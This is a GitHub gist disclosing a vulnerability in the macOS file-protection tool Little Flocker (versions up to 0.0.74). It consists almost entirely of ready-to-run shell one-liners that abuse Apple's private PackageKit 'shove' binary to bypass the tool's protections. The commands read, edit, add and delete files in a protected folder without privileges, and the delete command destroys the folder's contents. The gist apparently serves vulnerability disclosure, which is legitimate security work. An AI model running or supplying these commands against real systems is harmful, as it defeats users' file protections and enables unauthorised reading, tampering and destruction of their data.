Skip to content

Instantly share code, notes, and snippets.

@pwnsdx

pwnsdx/ff.sh

Last active Jul 13, 2018
Embed
What would you like to do?
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
# Read files (unprivileged)
DIRTOSEE="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOSEE; $(find $DIRTOSEE -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOSEE /tmp/prepwn$DIRTOSEE && cp -R /tmp/prepwn$DIRTOSEE /tmp/pwned$(dirname $DIRTOSEE) && $(find /tmp/prepwn$DIRTOSEE -exec sh -c 'if [ -d "/tmp/prepwn$1" ]; then mkdir -p "$1"; fi; touch -f "$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove /tmp/prepwn$DIRTOSEE $DIRTOSEE; rm -rf /tmp/prepwn
# Edit/Add files (unprivileged)
DIRTOEDIT="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOEDIT; $(find $DIRTOEDIT -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOEDIT /tmp/prepwn$DIRTOEDIT && cp -R /tmp/prepwn$DIRTOEDIT /tmp/pwned$(dirname $DIRTOEDIT) && $(find /tmp/prepwn$DIRTOEDIT -exec sh -c 'if [ -d "/tmp/prepwn$1" ]; then mkdir -p "$1"; fi; touch -f "$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove /tmp/prepwn$DIRTOEDIT $DIRTOEDIT; rm -rf /tmp/prepwn
# [edit or add files at /tmp/pwned then...]
DIRTOEDIT="$HOME/Desktop/test"; $(find /tmp/pwned$DIRTOEDIT -exec sh -c 'if [ -d "/tmp/pwned$1" ]; then mkdir -p "$1"; fi; touch -f "$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove /tmp/pwned$DIRTOEDIT $DIRTOEDIT; rm -rf /tmp/pwned
# Delete files (unprivileged)
DIRTODELETE="$HOME/Desktop/test"; mkdir /tmp/todelete; /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTODELETE /tmp/todelete; rm -rf /tmp/todelete
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment